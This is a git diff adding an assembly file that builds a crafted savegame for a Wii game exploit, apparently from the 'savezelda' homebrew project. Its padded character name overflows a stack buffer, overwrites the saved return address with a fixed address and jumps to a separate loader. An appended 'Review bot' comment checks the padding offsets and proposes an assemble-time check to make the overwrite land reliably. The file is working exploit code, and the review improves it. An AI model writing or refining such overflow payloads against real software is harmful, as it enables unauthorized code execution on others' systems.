X-Git-Url: http://wien.tomnetworks.com/gitweb/?p=savezelda.git;a=blobdiff_plain;f=batman%2Fhead.s;fp=batman%2Fhead.s;h=aa5081a8f195210b1eb524d02bddc103d8e1bd78;hp=0000000000000000000000000000000000000000;hb=da886e2a723e5990d209d8fc141dc9bab7bf0424;hpb=4d980dfebbc6faf212cf41a09240104118d8889f
diff --git a/batman/head.s b/batman/head.s
new file mode 100644
index 0000000..aa5081a
--- /dev/null
+++ b/batman/head.s
@@ -0,0 +1,31 @@
+# Copyright 2011 Bernhard Urban
+# This code is licensed to you under the terms of the GNU GPL, version 2;
+# see file COPYING or http://www.gnu.org/licenses/old-licenses/gpl-2.0.txt
+
+ retadr = 0x90394140
+0:
+ # stolen from some savegame found in teh intertube
+ .incbin "head.b"
+
+ # give the char a name
+ .ascii "you won't see this " # len = 0x14
+
+ # smash it \o/ 0x1f0+0x4 bytes all in all...
+ .fill (0xf4/4), 4, 0x11111111
+
+ # unlock the character (somewhere here actually...)
+ .fill (0x10/4), 4, 0x90c10104
+
+ # add more padding...
+ .fill (0xdc/4), 4, 0x11111111
+
+ # now we at the actual vuln return address
+ # just point to the loader of the loader (= content of exploit.s)
+ .long retadr
+
+ # alternatively you can put the code here too and jump into the stack,
+ # however then you have to take care for nullbytes in the resulting
+ # bytecode, which is a way too tedious. so we just take the further slot for
+ # it :-) (LEGO devs are nice ppl, heh)
+
+ .fill 0x10000 - (. - 0b)
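Review bot: The offset of the `.long retadr` slot is hand-counted across four directives and the comments do not agree with them: `# len = 0x14` on the `.ascii` line, while the literal as printed here is 19 bytes (a second trailing space may have been lost in rendering), and `# smash it ... 0x1f0+0x4` while 0x14 + 0xf4 + 0x10 + 0xdc sums to 0x1f4 before the `.long`. A single-word slip here moves the return-address word off the slot the overflow is aimed at and the payload just fails at runtime, so the intended offset should be pinned at assembly time with a label after the `.incbin` and an `.if`/`.error` check, with the expected constant set to whichever of the two figures is actually correct. `retadr = 0x90394140` would also benefit from a comment saying what determines that address (presumably where the output of exploit.s is loaded) so a change on that side is caught by the reader rather than by a crash.
```asm
	.incbin "head.b"
1:	# start of the overflowing region; all offsets below are relative to here
	# … unchanged: name, 0xf4 fill, unlock words, 0xdc fill …
	# assemble-time check: the return-address word must land exactly at the
	# offset the fills above were counted for (adjust the constant, not the check)
	.if (. - 1b) != 0x1f4
	.error "head.s: return-address slot is not at the expected offset"
	.endif
	.long retadr
```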